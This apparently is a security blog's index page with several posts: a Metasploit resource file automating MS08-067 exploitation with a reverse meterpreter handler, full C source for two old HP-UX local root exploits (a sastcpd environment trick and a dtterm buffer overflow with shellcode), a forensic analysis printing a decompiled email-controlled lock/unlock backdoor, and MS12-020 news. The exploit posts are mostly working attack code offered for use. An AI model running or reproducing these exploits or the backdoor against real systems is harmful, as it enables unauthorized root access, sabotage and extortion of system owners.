Automating low hanging fruit exploitation with metasploit resource files

cowhat

Low hanging fruit is most of the time the first thing as a security consultant I try, while I kick up the scanners I mostly also usually kick “extra” scans which are not full probe but only looking for specific vulnerabilities than in my experience are a quick way to go and gain enterprise administrator on the internal network.

So this time we are going to take a fairly easy example which is MS08-067 (the ever present and “will it ever die?” vulnerability) so automate it just to make the shells rain, but this can be changed for other vulnerabilities (which I will be updating and posting here)

A good thing is to be able to use ruby by using <ruby> </ruby>

I will dissect the entire resource file part by part, explain it and see a few “tricks” that I encountered to make it work:

use multi/handler
setg PAYLOAD windows/meterpreter/reverse_tcp
set ExitOnSession false

This just sets up the handler, payload and no ExitOnSession, nothing much and pretty standard on the resource files you can find on “them googles” next lines are:

if (framework.datastore['LHOST'] == nil )
    print_error("No LHOST set, where do we get the shells? go fix (must be global so setg instead of set)")
    return
end
if (framework.datastore['RHOSTS'] == nil)
    print_error("RHOSTS must be set globally (pro tip: use setg instead of set)... exiting")
    return
end

So this just checks that you have LHOST and RHOSTS setup, it does require the setg as it will go into the module and if not set globally the setup will just be gone, pretty simple.

Read the rest of this page »

If you like it, Share!

Video about Trapper 1.0 from Campus Party 2010 (SSH, SMB, FTP abuse and hijack using a hydra)

I found this gorgeous thing, 4 minutes but shows what trapper is, some code of it and some examples that were done right there:

Conferencia “Trapper, de sniffer a hydra” from Jonathan Cabrera on Vimeo.

If you like it, Share!

[Old Exploits] HPUX sastcpd local exploit

cowhat

Another oldie but goodie! there was a shell script roaming around but thought as an exercise at that time (I can only presume honestly, it’s been a while) and have the exploit setup in a .c file instead of having shell scripts all over the place (I personally dislike having exploits on shell scripts as they might go a bit rogue on you if you are not in the correct shell like ksh or so)

So here is yet another HP-UX exploit, keeping it coming, later I will dissect every single one of them and go thru them and the techniques evolved for all the exploits I post during this week! So come back to check them out!

Again change the “stdio.h” and so forth includes into :

/*
  x-sastcpd.c

  XyXyXyXy
  To all the shit that has hit my life: "FUCK U I'LL SEE YOU IN HELL!"
*/

#include "stdio.h"
#include "unistd.h"
#include "stdlib.h"

extern char **environ;

int main(int argc, char **argv) {
  char *env1, *env2;
  char buffer[1024];
  char *vuln;

  vuln = (char *)malloc(256);

  if(argc > 1) {
    snprintf(vuln, 255, "%s", argv[1]);
  }
  else {
    fprintf(stderr, "Usage: %s \n", argv[0]);
    exit(1);
  }

  if((env2 = getenv("HOME")) == NULL) {
    fprintf(stderr, "WHAT!? NO HOME?????\n");
    exit(-1);
  }

  fprintf(stderr, "Setting up the enviroment variable ...");
  snprintf(buffer, 1024, "%s/%s", env2, argv[0]);
  setenv("authprog", buffer, 1);
  fprintf(stderr, "DONE\n");

  if((env1 = getenv("LOCK")) == NULL) {
    fprintf(stderr, "sastcpd exploit by XyXyXyXy, .sh sux, all in one nice .c\n");
    setenv("LOCK", "XyXyXyXy", 0);
    execve(argv[0], argv, environ);
  }
  else {
    seteuid(0);
    setuid(0);
    setegid(0);
    setgid(0);
    execl("/sbin/sh", "/sbin/sh", NULL);
  }

  execl(vuln, vuln, NULL);

  return 0;
}

Simple and quick … ohhh yeah! keep it classy and GIT R DUN!

If you like it, Share!

[Old Exploits] dtterm HP-UX local buffer overflow in the display variable exploit

cowhat

Well here comes an oldie but goodie, the dtterm -display option is a very old bug, my google foo did not really show me any exploits on it (I saw some bugs about setting the DISPLAY= variable and having it crash I’ll presume is the same bug, I don’t have an HP-UX at hand and found this in a very very VERY old directory while roaming around in old HDs and thought to publish it as again I can’t find any for HP-UX.

This bug is annoyingly easy, yet so hard, at first I wanted to setup just I setup the linux exploits (more on that later) by execve() and so forth but … guess not! anyway this was around the 2000 while I was honestly still fiddling with new techniques browsing around and never publishing my exploits, I have removed the old header as it was holding an old handle :P keep the mistic going! LoL!

Due to my noobness please change the “stdio.h”, “unistd.h” and “stdlib.h” for , and (google prettify is not kind on those so they wouldn’t “show” on the HTML but would be in the source such as embedding fail)

/*
  x-dtterm-hpux.c

  XXXXXXXX
  "This bug is completly theoderaadtical"
*/

#include "stdio.h"
#include "unistd.h"
#include "stdlib.h"

#define BUFFSIZE  3000
#define ALIGN     0
#define NOP       0x08630243
#define OFFSET    0
#define FIRSTJUMP 40
#define RETADDR   0x7b00484c

static char shellcode[] =
"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
"\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
"\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff";

long get_sp(void) {
   __asm__("copy %sp,%ret0 \n");
}

int main(int argc, char **argv) {
  char c0de[4096];
  char *ch_ptr;
  char *envy;
  int aux;
  unsigned long addr;
  unsigned long addr2;
  int align = ALIGN;
  int buffsize = BUFFSIZE;
  int offset = OFFSET;
  unsigned long sysaddr;

  if(argc > 1) align = atoi(argv[1]) * 4;
  if(argc > 2) offset = atoi(argv[2]);

  ch_ptr = c0de;

  addr=get_sp()+offset;
  addr2 = RETADDR + offset;
  addr2 = c0de;
  
  for (aux=0; aux<(buffsize - align - strlen(shellcode) - 40*4)/4; aux++) {
    *(ch_ptr++)=(NOP>>24)&255;
    *(ch_ptr++)=(NOP>>16)&255;
    *(ch_ptr++)=(NOP>>8)&255;
    *(ch_ptr++)=NOP&255;
  }

  memcpy(ch_ptr, shellcode, strlen(shellcode));

  ch_ptr+=strlen(shellcode);
  
  for (aux=0; aux>24)&255;
    *(ch_ptr++)=(addr>>16)&255;   
    *(ch_ptr++)=(addr>>8)&255;
    *(ch_ptr++)=addr&255;
  }

  /*
  for (aux=0; aux<800; aux++) {
    *(ch_ptr++)=(addr2>>24)&255;
    *(ch_ptr++)=(addr2>>16)&255;   
    *(ch_ptr++)=(addr2>>8)&255;
    *(ch_ptr++)=addr2&255;
  }
  
  */
  c0de[BUFFSIZE-1]='\0';
  
  fprintf(stderr, "return address will be %#x shellcode is at %#x\n", addr, addr2);

  if(execl("/usr/dt/bin/dtterm", "dtterm", "-display", c0de, NULL) < 0) {
    fprintf(stderr, "whoa!\n");
    exit(1);
  }
  
}

Hope you like it, I have HP-UX 11.11 compiled exploit binaries, either dynamic or static. But who in his right mind would just grab a binary from someone and run it? if I can get a hold of an HP-UX 11.11 machine with gcc/cc compiler I can video the compilation, get the md5 and then upload.

Anyway back to the SUNDAY SUNDAY SUNDAY!!!

If you like it, Share!

ms12-020 saga: PoC exploit on pastebin and online rdp vulnerability scan: rdpcheck.com

ms12-020 PoC Leak

So then again, rolling and checking istherdpexploitoutyet.com found an interesting thing; they link to a PoC on pastebin, and apparently it messes up your box, I wonder how many people lost boxes on that one, but they link to another cool site rdpcheck.com they scan you back to check if you are vulnerable to RDP exploit, they even check you don’t use disposable addresses which is very interesting and cool.

So I put my gmail address and click test, I don’t have any RDP at my home address but I wanted to see how they do it with closed ports, then I’ll setup an exploitable RDP and let them scan me :) and update this post!

After you click on test you will receive something on the email like this (IP Address removed):

IP address tested: XXX.XXX.XXX.X
Time of test: Sat, 24 Mar 2012 14:50:38 EST
Result: RDP Port Filtered (Inconclusive)

Hmmm… We were unable to determine if we could access Remote Desktop Protocol from the Internet on it’s standard port. When we tested there was no response. This generally means that there is a firewall configured to be invisible – which is a good thing – but it can also be caused by network issues, ISP filtering, etc.
Because of this we cannot make a confident assessment of your exposure.

To err on the safe side you should assume that this means that your network is potentially vulnerable to exploitation of the MS12-020 RDP vulnerability from the Internet and is likely to contain unpatched systems.
Here’s a few things you can do…

Patch ALL of your Windows systems with the MS12-020 patch from Microsoft. To do this simply run Windows Update until it no longer suggests updates, or you can manually download Microsoft security bulletin and patches from Microsoft’s advisory here.

Check that you’ve patched ALL of your systems. Not just the Internet facing ones. When this vulnerability gets turned into an self-propagating RDP worm you’ll thank us for this advice.

Close off port Remote Desktop Services (RDP) to the Internet. RDP runs on TCP port 3389. If this means nothing to you, ask your I.T. guy.

Disable RDP on machines that don’t need it. RDP is fantastically useful, but if you don’t need it, turn it off.

Give your I.T. guy a smack on the wrist and tell him/her to stop running Remote Desktop Protocol on the Internet. This is a risky practice, superbug or no superbug, because it gives full access to a machine. Use a VPN for remote access instead.

From Microsoft: “Consider how you might harden your environment against unauthenticated, attacker-initiated RDP connections.” Some of the tips here are a part of this general advice. If you need more help with this get in touch via our contact form.

Read, understand and action the advice from Microsoft here and here. If none of it makes sense to you, talk to your I.T. guy or get in touch via our contact form.

This is pretty cool and useful at least for the average joe :)

I still wonder … IS THE RDP EXPLOIT OUT YET!?!?!?!?

If you like it, Share!

[Your worst enemy: The rogue consultant/admin] py_util.pyc LOCK/UNLOCK backdoor over email

I recently had to actually do a fast forensic job for a friend, he asked me some help as he was taking over some business which were “abandoned” by an “open source consultant” which is to say pretty much installs everything on linux and does half coding in this case.

The problem raised when as soon as they took over the network within the hour a critical system for the business stopped working, this was more than suspicious as before in another business that was also admin by this person before had some files erased and configurations lost when it was transitioned to another admin because of lack of administration and ethics on the admin part.

First I tried to decompile the python files form the Django server, this was because obviously all the servers where blocked but for port 80. My friend innocently forgot to block all access to the internet as he thought that was not that hardcore important (#FAIL) and he didn’t really think this person (who know actually is consulting for a major bank in Mexico) would backdoor and do this type of stuff.

The first thing was to run it on strings to figure out what is there (credentials and paths removed for security reasons):

fsckOSX:~ nahual$ strings py_util.pyc
EmailMultiAlternatives(
MIMEImage(
datetimeN(
Parsers
fxxxxxxxxxxo@gmail.comt
mxxxgyyczzt
LOCKSYSTEMt
UNLOCKSYSTEMt
GETIPs$
/home/xxxxxxx/svn/yyyyyyyy/.python.logc
pop.gmail.comi
Subjectt
bloqueandot
desbloqueandot8
2baa224d0a3515912218fd88c1dd9d90d347c451c67811ac6240f4a1(
poplibt
POP3_SSLt
usert
pass_t
passwdt
Exceptiont
lent
listt
ranget
retrt
joinR
parsestrt
LOCKt
opent
file_logt
writet
closet
UNLOCKR
check_ipt
quit(
errt
numerot
responset
headerLinest
bytest
mensajet
emailt
subjectt
/home/xxxxxxx/svn/yyyyyyy/../yyyyyyy/py_util.pyt
check_locker
setup_environ(
BeautifulSoups
hxxxxxxx3@gmail.comR

http://www.cualesmiip.comt

divt
miipt
IP del servidort
from_emails
text/html(
urllib2t
django.core.managementR/
xml.dom.minidomR0
settingst
urlopent
readt
findt
findAllR
DEFAULT_FROM_EMAILt
attach_alternativet
send(
xmlR0
listmailt
contentt
feedR&
html_contentR,
msg(
/home/xxxxxxx/svn/yyyyyy/../yyyyyy/py_util.pyR
__main__(
django.core.mailR
email.MIMEImageR
smtplibR
email.ParserR
__name__(
/home/xxxxxxxx/svn/yyyyyy/../yyyyy/py_util.pyt

fsckOSX:~ nahual$

py_util.pyc wouldn’t fastly decompile, thus after putting it into IDA and other nice decompile this is what was found (credentials removed for security reasons):


from django.core.mail import EmailMultiAlternatives
from email.MIMEImage import MIMEImage
from datetime import datetime
import smtplib
import poplib
from email.Parser import Parser

user = 'xxxxxx'
passwd = 'xxxxxxxx'
LOCK = 'LOCKSYSTEM'
UNLOCK = 'UNLOCKSYSTEM'
GETIP = 'GETIP'
file_log = '/home/xxxxx/svn/yyyyyy/.python.log'

def check_locker():
try:
m = poplib.POP3_SSL('pop.gmail.com', 995)
m.user(user)
m.pass_(passwd)
except Exception, err:
print err
else:
numero = len(m.list()[1])
for i in range(numero):
(response, headerLines, bytes) = m.retr(i + 1)
mensaje = '\n'.join(headerLines)
p = Parser()
email = p.parsestr(mensaje)
subject = email['Subject']
if (subject == LOCK):
print 'bloqueando'
f = open(file_log, 'w')
f.write('')
f.close()
elif (subject == UNLOCK):
print 'desbloqueando'
f = open(file_log, 'w')
f.write('xxxxxxxxxxxxx')
f.close()
elif (subject == GETIP):
check_ip()
m.quit()

def check_ip():
import urllib2
from django.core.management import setup_environ
import xml.dom.minidom
from BeautifulSoup import BeautifulSoup
import settings
setup_environ(settings)
listmail = ['xxxxxxxx@gmail.com']
content = ''
feed = urllib2.urlopen('http://www.google.com')
response = BeautifulSoup(feed.read())
html_content = response.find('div', {'id': 'miip'}).findAll('b')[0]
subject = 'IP del servidor'
msg = EmailMultiAlternatives(subject, content, to=listmail, from_email=settings.DEFAULT_FROM_EMAIL)
msg.attach_alternative(html_content, 'text/html')
msg.send()
if (__name__ == '__main__'):
check_ip()

As you can see the backdoor is pretty small and “efficient”, it checks a gmail account, if an email to that account is sent with the LOCKSYSTEM it will automatically shutdown the application, and you can of course unlock the system with another email.

This might be coded because they thought maybe the client wouldn’t pay them? why would he code something like this without the client consent? no documentation was delivered from the code, and as soon as the admin/developer was let go, the system was shutdown within the hour, sounds to me more like a blackmail function than a current admin function as it only turns off the system, no backups anything.

This makes me wonder why this would be created? or executed? I thought about writing a fast and ugly rule to make sure if anything happened like this again at least the snorts would be alerted and told my friend to lock down the firewall rules, but this lack of ethics is overwhelming, I wonder what the bank would think of him being used to backdoor stuff to keep a foot in the door? jeeeeezzzzz

Snort rule would not really work as it’s doing pop3 over SSL, but then blocking port 993 should lock him out, still … why people do this? don’t they understand this lack of ethics is preposterous?

If you like it, Share!

MS12-020, The saga continues: exploit code published for the RDP chinese worm leaked from Microsoft?

I was sent this link which is hilarious: http://istherdpexploitoutyet.com/

Has some really short information on the exploit and PoC and obviously who bought it (yes kids ZDI bought this one, gave it to Microsoft and then one of them managed to leak it) but apparently the original exploit code was leaked (complete article HERE)

From the article:

“Chinese hackers have released proof-of-concept code that provides a roadmap to exploit a dangerous RDP (remote desktop protocol) vulnerability that was patched by Microsoft earlier this week.

The publication of the code on a Chinese language forum heightens the urgency to apply Microsoft’s MS12-020 update, which addresses a remote, pre-authentication, network-accessible code execution vulnerability in Microsoft’s implementation of the RDP protocol.”

Well I’m not fluent on Chinese at all, BUT when I went into the website it clearly says on the top:

“0day discount
This BLOG from time to time the market of 0day of exp”

Errr I’m sorry but that does not tell ANYONE to go and patch as the article says, they actually even go further on saying: “Thanks to 360 friends to provide the EXP.” Well apparently 360 guys managed to grab that exploit which apparently has a special signature from the reseracher Luigi Auriemma (@luigi_auriemma)

That is a good practice and I hope it starts out again, watermarking the PoCs so you can see where the leak is, the interesting part is … Who is owned by the chinese? ZDI? or Microsoft? if they leaked that, which others have been leaked?

This bug will end up showing more flaws of handling them and the leaking of it’s PoC than the bug itself!

UPDATE:

On this tweet (https://twitter.com/#!/luigi_auriemma/status/180646548395401216) Luigi Auriemma confirms it was Microsoft the leak.

Luigi Auriemma ‏ @luigi_auriemma
in case isn’t clear yet: rdpclient.exe seems written by Microsoft using the original packet poc I sent to ZDI. MS is the source of the leak

His Advisory can be seen HERE

If you like it, Share!

MS12-020 the new MS08-067?

From Microsoft’s support website:

MS12-020: Vulnerabilities in Remote Desktop could allow remote code execution: March 13, 2012

The interesting is that on this link (http://support.microsoft.com/kb/2671387) it says on the more information tab:

“2667402 MS12-020: Description of the security update for Terminal Server Denial of Service Vulnerability: March 13, 2012″

But then on this link (http://blogs.technet.com/b/msrc/archive/2012/03/13/strength-flexibility-and-the-march-2012-security-bulletins.aspx) they actually talk about a critical one, which means it’s exploitable, which has turned a lot of heads and wonder if this bug will end up being the new MS08-087 due to longevity on it (God knows finding that one will render Enterprise Admin or Domain Admin too quick most of the times anyway)

Let’s see how fast the guys at metasploit project (www.metasploit.com) will come up with an exploit for it!

(NOTE: Thank you so much flacman for catching the typo .. sorry!!!!)

If you like it, Share!

AlienVault OSSIM on Cisco 4255 IPS (part 1)

For my previous job I designed the defense infrastructure, this was an interesting challenge specially since this is a fast and complex environment (SaaS environment) and as usual ever changing and growing, one of the restrictions was that we wanted to reuse end of life CISCO 4255 IPS that we had in there and wanted to be able to get them out.

So first things first, getting the Cisco IPS 4255 unracked and get them to the office? NO, ssh into them and try to get the then SOC Monitor Eng to try to do it, as soon as I got into the “maintenance” shell realized it’s an old 2.4.X modified linux with a very (VERY) small disc space of 512 Megs, loaded as read-only with bigmem filesystem to keep the logs.

So first it was to deploy a chrooted image of a linux systems, this has a small challenge, deboostrapped a really old image (that took a bit of tweaking since everything was so old on that box) tarball it and then swear a bit as gcc, glibc, etc was not on the first image and redo the image, this systems have no internet connection for security purposes so it wasn’t a fast apt-get install with old archive repositories.

Then it was to compile snort rules, but … ended up with a very old snort, compiled barnyard and run like that for a week as a test (it wasn’t my project anyway I was just helping the SOC)

First problem:

- Reboot, your chroot system was gone. Why? easy the chroot had to be run within the bigmem partition, which for some weird reason wouldn’t backup our directory so it would wipe it out and put old logs in there (I presume it was a license thing or a signature stuff I wasn’t as interested to make it work)

The demo worked and as the SOC engineer pretty much stood up, grabbed his stuff and left without notice all the sudden .. VOILA! I got the SOC.

First things first and that was to mod OSSIM, which is an entirely different post altogether into an office server and verify that it works and it was what we were looking for.

Then, voila the CISCO IPS were unracked and sent to my office, where I could open them up, facepalm and try to make them work.

So what is on the CISCO IPS 4255?

Short answer: a VERY VERY old 2.4 kernel linux, tricked out and with some stuff, I think I made an image of the 512 MB OS, but I’m sure CISCO wouldn’t be happy if I just linked into it :)

If you like it, Share!

SQLMap query problems

Well, I run with psymera a CTF game and we are constantly adding new VMWare machines and new tests just to keep on playing and not get bored. As part of a internal training where I work I started to create some videos on how to use SQLMap (I promise to upload here shortly in a big rant about it) so I started on what everyone does: update your version.

And something interesting happened, sqlmap enumeration broke (gorgeous) but it didn’t look much like it, it baffled me at first, so much that I had to do all by hand and asked psymera if he changed something, he said no.

So this is the info of the updated sqlmap version to that date:


root@fsckOSX:/pentest/database/sqlmap# svn info
Path: .
URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
Repository Root: https://svn.sqlmap.org/sqlmap
Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
Revision: 4380
Node Kind: directory
Schedule: normal
Last Changed Author: stamparm
Last Changed Rev: 4380
Last Changed Date: 2011-09-19 12:08:08 -0700 (Mon, 19 Sep 2011)

the SVN rev is 4380, latest at Sep 19th, here is the example of a run against the vulnerable web server with this revision.

Read the rest of this page »

If you like it, Share!